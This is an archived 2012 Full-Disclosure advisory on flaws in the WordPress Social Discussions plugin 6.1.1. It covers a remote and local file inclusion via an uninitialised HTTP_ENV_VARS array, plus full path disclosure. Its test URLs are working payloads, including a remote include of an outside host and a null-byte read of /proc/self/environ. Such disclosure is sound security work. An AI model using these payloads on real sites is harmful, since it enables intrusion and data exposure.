lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Wed, 17 Oct 2012 05:29:10 -0700 (PDT)
From: Janek Vind <come2waraxe@...oo.com>
To: "full-disclosure@...ts.grok.org.uk" <full-disclosure@...ts.grok.org.uk>
Subject: [waraxe-2012-SA#093] - Multiple Vulnerabilities
	in Wordpress Social Discussions Plugin


[waraxe-2012-SA#093] - Multiple Vulnerabilities in Wordpress Social Discussions Plugin
======================================================================================

Author: Janek Vind "waraxe"
Date: 17. October 2012
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-93.html


Description of vulnerable target:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Enables Social Sharing of your blog posts to 30+ Social Networks. Plugin also
enables you to Automatically Publish or Self Publish your Blog Posts to 25+ 
Networks.

http://wordpress.org/extend/plugins/social-discussions/

Affected version: 6.1.1

###############################################################################
1. Remote File Inclusion in "social-discussions-networkpub_ajax.php"
###############################################################################

Reasons: Uninitialized variable "$HTTP_ENV_VARS"
Attack vectors: User-supplied parameter "HTTP_ENV_VARS"
Preconditions:
 1. register_globals=on
 2. register_long_arrays=off
 3. allow_url_include=on for RFI if PHP >= 5.2.0
 4. PHP must be < 5.3.4 for LFI null-byte attacks
 5. magic_quotes_gpc=off for LFI null-byte attacks
 
 
Php script "social-discussions-networkpub_ajax.php" line 2:
------------------------[ source code start ]----------------------------------
if (!function_exists('add_action')){
  @include_once($GLOBALS['HTTP_ENV_VARS']['DOCUMENT_ROOT'] . "/wp-config.php");
------------------------[ source code end ]------------------------------------

We can see, that script expects old-style array "HTTP_ENV_VARS" to be initialized
and containing "DOCUMENT_ROOT" entry. But it appears, that if PHP directive
"register_long_arrays=off", then "HTTP_ENV_VARS" is uninitialized and if in
same time "register_globals=on", it is possible to fill that array with any
value, leading to the RFI (Remote File Inclusion) vulnerability.


Tests:

http://localhost/wp342/wp-content/plugins/social-discussions/social-discussions-networkpub_ajax.php?HTTP_ENV_VARS[DOCUMENT_ROOT]=http://php.net/?

http://localhost/wp342/wp-content/plugins/social-discussions/social-discussions-networkpub_ajax.php?HTTP_ENV_VARS[DOCUMENT_ROOT]=/proc/self/environ%00z


###############################################################################
2. Full Path Disclosure in multiple scripts
###############################################################################

Reasons: Direct request to php script triggers pathname leak in error message
Preconditions: PHP directive display_errors=on
Result: Information Exposure Through an Error Message

Tests:

http://localhost/wp342/wp-content/plugins/social-discussions/social-discussions-networkpub.php

Fatal error: Call to undefined function __() in
C:\apache_www\wp342\wp-content\plugins\social-discussions\social-discussions-networkpub.php on line 2

http://localhost/wp342/wp-content/plugins/social-discussions/social-discussions.php

Fatal error: Call to undefined function __() in
C:\apache_www\wp342\wp-content\plugins\social-discussions\social-discussions-networkpub.php on line 2

http://localhost/wp342/wp-content/plugins/social-discussions/social_discussions_service_names.php

Fatal error: Call to undefined function __() in
C:\apache_www\wp342\wp-content\plugins\social-discussions\social_discussions_service_names.php on line 3



Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

come2waraxe@...oo.com
Janek Vind "waraxe"

Waraxe forum:  http://www.waraxe.us/forums.html
Personal homepage: http://www.janekvind.com/
Random project: http://albumnow.com/
---------------------------------- [ EOF ] ------------------------------------

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ